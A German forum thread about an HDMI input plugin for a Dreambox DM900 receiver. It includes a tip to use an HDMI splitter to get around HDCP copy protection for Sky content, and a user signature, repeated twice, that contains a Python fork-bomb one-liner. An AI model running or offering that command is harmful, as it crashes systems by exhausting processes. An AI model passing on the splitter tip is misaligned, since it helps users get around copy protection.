Hallo. Wie bekomme ich den HDMI Input in die Kanalliste??Hoffe jemand kann mir helfen. Ich habe eine DM900
HDMI Input Plugin
-
-
Lies den Titel deines Threads und BENUTZE es, in den Einstellungen MEINES HDMI Input Plugins kannst du aufdrehen das es als Kanal in den Favoriten auftauchen soll, was aber alles in seinem eigenen Plugin kit und support Thread erklärt ist.
Und nein der Thread ist nicht hier ... -
Da dachte ich mir, stecke ich mal das HDMI-Kabel vom Sky+ Receiver mit der Zweitkarte rein, damit ich wenigstens ansatzweise das Gefühl habe, ich könnte Sky1 auf der Dream gucken. Aber Pustekuchen... das blöde Ding erkennt, dass es kein TV ist
Alle anderen Programme (außer halt die von Sky) lassen sich übrigens super übertragen, und die Qualität ist auch gut! -
HDMI splitter kaufen der sich entsprechend positiv dem receiver meldet....dann ist gucken und auch aufnehmen kein problem
-
Danke für den Tip! Wäre es auch möglich, dass das Plugin es dem Receiver vorgaukelt, oder ist das zu viel Tüftelei?
-
und du uebernimmst dann meine Anwaltskosten????
-
Haha, nee lieber nicht.
-
dann fragt nicht solchen bloedsinn.
-
Mit welchen Splittern funktioniert das denn?
-
-
Zum Thema Anwalt: heise.de/newsticker/meldung/St…er-vom-Markt-3198575.html
Auch spannend ein alter Artikel: heise.de/newsticker/meldung/HD…-ausgehebelt-1807866.html
Heise schrieb:
[...]
Andernfalls würde sie wohl das gleiche Schicksal ereilen wie die bereits vor geraumer Zeit aufgetauchten Kästchen, mit deren Hilfe sich der Kopierschutz für nicht-HDCP-konforme Geräte umgehen ließ. Diese gelangten nie offiziell in den Handel, weil der Hersteller damit gegen das Patent des HDCP-Administrators Digital Content Protection LLC verstoßen hatte und ziemlich sicher verklagt worden wäre.
Der neuerliche Hack macht deutlich, dass die Verschlüsselung per HDCP für ernsthafte Angriffe keine große Hürde darstellt. Sie richtet lediglich gesetzliche Hürden auf und stellt sicher, dass das "geschützte" Filmmaterial von der Masse der Zuschauer nicht kopiert wird.
[...]
-
Darum geht es nicht - wenn ich als Author so eine Lösung anbieten würde weil es "eh schon gehackt" wurde wäre ich genauso klagbar und würde mich strafbar machen - das ist dem Richter nämlich sowas von egal ...
-
Ähm klar. Genau das besagt das Zitat meiner Ansicht nach auch. Also ich wollte gar nix anderes aussagen
Wenn es aber dennoch Hersteller aus Fernost und so gibt, wird der schwarze Peter halt dem Händler oder Käufer User zugeschoben -
In die Bewertungen bei amazon steht, dass der Kasten nicht mit Sky funktioniert. Wer hat nun Recht?
Edit: Zu schnell geschrieben, wird beides dort angegeben... -
Genau der werkelt hier einwandfrei.python -c 'while 1: __import__("os").fork()'
Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras ! -
also seit dem grossen E2 update gestern geht bei mir kein HDMi-In mehr
unser plugin getestet und das von gutemine,
es kommt kein bild, dann irgendwann wird das tv bild nur rosa
und die box reagiert sogut wie gar nicht mehr. hilft nur noch ein reboot
irgendwas hat DMM da wieder geändertProbleme kann man niemals mit derselben Denkweise lösen.
¯\_(ツ)_/¯
"Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen." -
Also hier geht noch alles auf der 900er.python -c 'while 1: __import__("os").fork()'
Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras ! -
Kann ich nur bestätigen, auf meiner 900er läuft es auch einwandfrei.
Gesendet von iPhone mit Tapatalk -
jo funktioniert tatsächlich normal, wenn man auch das HDMI Kabel an den HDMI-IN
anschliesst....
Ich schiebs mal auf die Zeitumstellung....Probleme kann man niemals mit derselben Denkweise lösen.
¯\_(ツ)_/¯
"Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen." -
deepblue2000 schrieb:
jo funktioniert tatsächlich normal, wenn man auch das HDMI Kabel an den HDMI-IN
anschliesst....
Ich schiebs mal auf die Zeitumstellung....
-
Teilen
- Facebook 0
- Twitter 0
- Google Plus 0
- Reddit 0
-